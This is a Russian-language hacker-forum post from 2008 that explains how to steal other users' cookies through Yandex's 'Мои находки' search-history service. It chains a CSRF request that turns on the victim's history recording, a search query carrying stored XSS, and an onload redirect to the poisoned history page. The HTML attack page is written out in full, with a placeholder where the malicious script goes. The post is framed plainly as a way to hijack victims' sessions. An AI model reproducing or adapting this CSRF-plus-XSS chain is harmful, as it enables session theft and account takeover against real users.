11.12.2008, 20:39
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
С нами:
9681386
Репутация:
2145
|
|
Яндекс.
На Яндексе есть такой сервис- "Мои находки" (nahodki.yandex.ru). Если запись истории включена, то на странице http://nahodki.yandex.ru/results.xml мы можем наблюдать свои поисковые запросы, и эти строки не фильтруются.
Что нам нужно сделать, чтобы поиметь чужие куки: - "Насильно" включить юзеру запись истории
- Послать яндексу ядовитый поисковый запрос
- Направить юзера на зараженную страницу истории запросов
Для этого будем направлять жертву на специальную страницу(через iframe сделать не удалось, т.к. яндекс не разрешает показывать свои страницы во фреймах).
Кодес:
Код:
<html>
<body onload="location.href='http://nahodki.yandex.ru/';">
<img src="http://nahodki.yandex.ru/save_tunes.xml?store=1">
<img src="http://yandex.ru/yandsearch?clid=14585&text=тут_наш_злобнокодес">
</body>
</html>
|
|
|